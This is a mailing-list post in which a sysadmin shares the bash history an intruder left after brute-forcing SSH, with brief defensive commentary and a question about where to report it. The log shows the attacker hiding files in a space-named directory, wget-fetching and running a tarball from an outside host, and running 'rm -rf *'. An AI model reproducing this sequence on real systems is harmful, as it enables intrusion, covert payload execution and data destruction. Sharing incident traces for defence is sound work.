[K12OSN] OT: Break-In report
Rob Owens
rob.owens at biochemfluidics.com
Wed Jan 2 13:52:58 UTC 2008
I thought you guys might be interested in seeing the tracks of a
computer break-in. I won't say whose system it was (to protect the
embarassed), but the break-in was nothing but a brute-force ssh attempt
at guessing usernames and passwords. A regular user account was
compromised and here is his bash history:
> ls
> cd who
> ls
> exit
> w
> cd /var/tmp
> ls -a
> cd "
> mkdir " "
> cd " "
> wget quest.dif.jp/x.tgz
> tar zxvf x.tgz
> cd x
> ./start dbdb
> cd ..
> ls -a
> rm -rf *
> passwd
> ls -a
> ps aux
> ps aux | grep dan (note: the hacked user account was "dan")
> top
> who
> exit
I particularly like the use of " " as a directory name. Nice and
invisible. Also note that the invader put his files in two directories
which have the "sticky" bit set: /dev/shm and /var/tmp
In the end, it seems that all the invader succeeded in doing was a bunch
of port-scanning. The OS is going to be re-installed anyway, just to be
safe.
Are there any organizations out there that this should be reported to?
(For instance, the way one might send reports to an antivirus group or a
content filtering group).
-Rob
More information about the K12OSN
mailing list